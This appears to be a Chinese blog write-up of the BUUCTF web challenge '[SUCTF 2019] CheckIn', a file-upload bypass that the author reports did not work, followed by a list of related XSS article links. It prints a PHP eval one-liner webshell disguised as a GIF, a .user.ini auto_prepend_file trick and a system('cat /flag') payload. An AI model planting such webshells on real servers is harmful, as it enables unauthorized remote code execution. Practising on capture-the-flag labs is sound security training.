106,【6】 buuctf web [SUCTF 2019]CheckIn

进入靶场

文件上传

老规矩,桌面有啥传啥

过滤了<?

寻找不含<?的一句话木马

文件名

123(2).php.jpg

文件内容

GIF89a?

<script language="php">eval($_GET['123']);</script>

123即密码,可凭借个人喜好更换

再上传一个文件将jpg文件变成php文件执行

这里用到.htaccess发现不行

尝试.user.ini

文件名

123(3).user.ini

文件内容

GIF89a

auto_prepend_file=123(3).php.jpg

文件名

123(3).php.jpg

文件内容

GIF89a

<script language='php'>system('cat /flag');</script>

按理说该查看即可得到flag了

但查看时为空

看看是哪步出了问题

没有上传成功

修改文件名,还是上传不成功

摧毁靶机,重试

要么url中81就不见了,像上图

要么返回上传页面

还发现不管上传什么路径都不变,尝试上传下面这张图片,还是那个路径,不是,路径变都不变,还是没上传成功,访问不到,这只是一个中规中矩的图片

尝试修改文件那么多遍,合着题目有问题

我再最后改一次

再开启一次靶场

还是不行

净是些让人破防的题

想到见到了很多次状态码500,搜搜看什么意思

so???????????????????????????????

相关推荐
白山云北诗2 小时前
打造网络安全堡垒,企业如何应对DDoS、CC、XSS和ARP攻击
安全·web安全·ddos·xss
初遇你时动了情3 天前
前端、XSS(跨站脚本攻击,Cross-Site Scripting)
前端·xss
不灭锦鲤3 天前
xss-lab靶场基础详解第1~3关
前端·xss
Мартин.5 天前
[Meachines] [Hard] Holiday SQLI+XSS-Bypass+RCE-HEX-Shell+TRP00F+npm特權升級
前端·npm·xss
帅云毅7 天前
文件操作--文件包含漏洞
学习·web安全·php·xss·印象笔记
黄同学real9 天前
微信小程序 XSS 防护知识整理
微信小程序·小程序·xss
黄同学real9 天前
前端安全中的XSS(跨站脚本攻击)
前端·安全·xss
NoneCoder9 天前
HTML与安全性:XSS、防御与最佳实践
前端·html·xss
工呈士14 天前
HTML与安全性:XSS、防御与最佳实践
前端·html·xss
帅云毅14 天前
Web漏洞--XSS之订单系统和Shell箱子
前端·笔记·web安全·php·xss